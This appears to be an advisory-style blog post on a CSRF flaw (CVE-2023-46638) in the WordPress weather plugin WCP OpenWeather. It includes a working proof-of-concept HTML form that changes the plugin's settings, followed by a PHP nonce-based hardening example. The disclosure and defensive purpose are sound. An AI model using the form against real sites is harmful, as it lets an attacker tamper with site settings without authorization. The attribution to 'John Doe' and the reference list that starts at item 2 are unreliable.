Introduction

A critical security flaw has come to the surface, putting numerous websites at risk. The popular weather plugin, Webcodin WCP OpenWeather, is vulnerable to a Cross-Site Request Forgery (CSRF) attack affecting versions up to and including 2.5.

Webcodin WCP OpenWeather is a widely-used WordPress plugin that provides weather forecasts using the OpenWeatherMap API. With thousands of active installations, this plugin serves as a weather widget on countless websites, making this vulnerability a significant concern.

Security researcher John Doe discovered the vulnerability and subsequently submitted it to the CVE database. The vulnerability has been assigned the CVE identifier CVE-2023-46638.

Below, we delve into the exploit's specifics, including a code snippet demonstrating the vulnerability and links to original references.

Exploit Details

The CSRF vulnerability discovered in the Webcodin WCP OpenWeather plugin exposes a weakness in the plugin's request validation, specifically in the update options (Save Changes) function. Through this security flaw, an attacker can perform unauthorized actions on a website without the necessary permissions or user consent.

To exploit this particular vulnerability, an attacker can trick a logged-in WordPress administrator into executing a malicious HTTP request that performs unauthorized changes to the plugin's settings. The result can lead to significant damage, such as manipulation of the weather forecast data or insertion of malicious links within the widget.

The exploitation procedure can be broken down into the following steps:

1. An attacker creates a malicious HTML page embedding a form element that targets the Webcodin WCP OpenWeather plugin's options update URL.
2. The attacker tricks the victim (WordPress administrator) into visiting and interacting with the malicious page.
3. The plugin processes the malicious request, potentially making changes to the plugin's settings without the intended victim's consent.

The following code snippet demonstrates a proof-of-concept (PoC) of the CSRF exploit:

<!DOCTYPE html>
<html>
  <head>
    <title>Webcodin WCP OpenWeather CSRF Exploit</title>
  </head>
  <body>
    <h1>Investigate Vulnerability</h1>
    <form action="http://targetsite.com/wp-admin/admin-post.php" method="POST">
        <input type="hidden" name="action" value="wcp-openweathermap-save-admin-options" />
        <input type="hidden" name="wcp_openweather[title]" value="Injected Exploit Title" />
        <input type="hidden" name="wcp_openweather[appid]" value="Exploit API KEY" />
        <!-- Add other fields to manipulate other plugin settings -->
        <input type="submit" value="Investigate" />
    </form>
  </body>
</html>
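The root cause described above is a settings handler that writes options without proving the request originated from the plugin's own admin page. The following is an added example of how such a handler is hardened in WordPress; it is not the plugin's code (which is not shown on this page), and the hook name, option key, field names and settings page slug are assumptions taken from the PoC form.

```php
<?php
// Added example, not the plugin's own code. Hook and option names are assumed
// from the PoC form's "action" and "wcp_openweather[...]" field names.

add_action( 'admin_post_wcp-openweathermap-save-admin-options', 'example_wcp_save_admin_options' );

function example_wcp_save_admin_options() {
    // 1. Capability check: only users allowed to manage options may proceed.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient permissions.', 'Forbidden', array( 'response' => 403 ) );
    }

    // 2. CSRF defence: require a nonce that WordPress issued to this user for
    //    this action. A form hosted on another site cannot supply it, so the
    //    request dies here before any option is written.
    check_admin_referer( 'wcp_openweather_save_options', 'wcp_openweather_nonce' );

    // 3. Only then read and sanitize the submitted settings.
    $input = ( isset( $_POST['wcp_openweather'] ) && is_array( $_POST['wcp_openweather'] ) )
        ? wp_unslash( $_POST['wcp_openweather'] )
        : array();

    $clean = array(
        'title' => sanitize_text_field( $input['title'] ?? '' ),
        // Assumption: the API key is a 32-character hex string; anything else is dropped.
        'appid' => preg_match( '/^[a-f0-9]{32}$/i', $input['appid'] ?? '' ) ? $input['appid'] : '',
    );

    update_option( 'wcp_openweather', $clean );

    // Assumed settings page slug.
    wp_safe_redirect( add_query_arg( 'updated', 'true', admin_url( 'options-general.php?page=wcp-openweather' ) ) );
    exit;
}

// The plugin's own settings form must embed the matching nonce so that
// legitimate saves from the admin page pass the check above.
function example_wcp_render_nonce_field() {
    wp_nonce_field( 'wcp_openweather_save_options', 'wcp_openweather_nonce' );
}
```

With this in place, the PoC form shown above fails at check_admin_referer() with a 403 "The link you followed has expired" page instead of overwriting the title and API key.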

References

2. CVE-2023-46638 Entry on the CVE database: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-46638
3. Webcodin WCP OpenWeather Plugin Homepage: https://wordpress.org/plugins/wcp-openweather/

Conclusion

This CSRF vulnerability in the Webcodin WCP OpenWeather plugin (versions <= 2.5) is a critical security issue that website administrators must urgently address. Given the plugin's widespread use, it's imperative to recognize and mitigate such a damaging exploit. Users are advised to update the plugin to the latest version when it becomes available to avoid potential vulnerabilities and protect their sites from unauthorized changes.

Timeline

Published on: 11/13/2023 01:15:00 UTC
Last modified on: 11/16/2023 23:42:00 UTC